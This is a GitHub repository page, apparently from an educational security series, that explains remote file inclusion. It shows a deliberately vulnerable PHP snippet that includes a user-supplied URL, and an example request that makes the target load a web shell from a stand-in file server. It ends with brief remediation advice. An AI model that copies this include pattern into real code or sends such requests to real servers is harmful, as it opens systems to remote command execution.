Skip to content
/ remote-file-inclusion Public

A threat actor may cause a vulnerable target to include/retrieve remote file

License

AGPL-3.0 license
1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

qeeqbox/remote-file-inclusion

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
remote-file-inclusion.drawio
remote-file-inclusion.drawio
 
 
remote-file-inclusion.png
remote-file-inclusion.png
 
 

Repository files navigation

A threat actor may cause a vulnerable target to include/retrieve remote file

Example #1

  1. A threat actor uploads a PHP web shell to a temporary file service
  2. A threat actor sends a malicious request that includes the remote file name to a vulnerable target
  3. The vulnerable target executes malicious files as PHP

Code

Target-Logic

#allow_url_include = On

<?php
  $file = $_GET["file"];
  include $file;
?>

Target-In

http://vulnerable.test/index.php?file=http://fileserver.test/shell.php

Target-Out

root

Impact

High

Names

  • Remote file inclusion
  • RFI

Risk

  • Read & Write data
  • Command Execution

Redemption

  • Input validation
  • Whitelist

ID

cb60059e-846f-40df-9dbd-e687e8d6960a

References

About

A threat actor may cause a vulnerable target to include/retrieve remote file

Topics

remote file vulnerability inclusion qeeqbox infosecsimplified

Resources

Readme

License

AGPL-3.0 license

Code of conduct

Code of conduct
Activity
Custom properties

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Sponsor this project

 
Learn more about GitHub Sponsors